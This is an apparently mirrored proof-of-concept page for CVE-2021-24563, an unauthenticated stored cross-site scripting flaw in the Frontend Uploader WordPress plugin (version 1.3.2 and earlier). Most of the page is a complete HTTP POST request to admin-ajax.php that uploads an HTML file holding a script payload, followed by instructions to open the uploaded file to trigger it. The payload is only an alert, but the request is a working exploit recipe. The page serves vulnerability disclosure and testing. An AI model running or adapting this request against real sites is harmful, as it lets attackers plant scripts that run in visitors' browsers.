CVE-2021-24563 PoC — Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

Source

https://github.com/V35HR4J/CVE-2021-24563

Associated Vulnerability

Title:Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting (CVE-2021-24563)
Description:The Frontend Uploader WordPress plugin through 1.3.2 does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly

Description

The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly

Readme

# CVE-2021-24563
Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly

# Proof of Concept

In a page/posts where the [fu-upload-form] shortcode is embed, simply upload an HTML file via the generated form
```

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"

1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html

<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"

upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"

image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"

021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"

92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"

1247
-----------------------------124662954015823207281179831654--


Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html

```
# Video POC:
https://www.youtube.com/watch?v=lfrLoHl4-Zs

File Snapshot


 [4.0K]  /data/pocs/bf5323537f71a9dfe411ab99a4045454f7d08032
└── [2.3K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!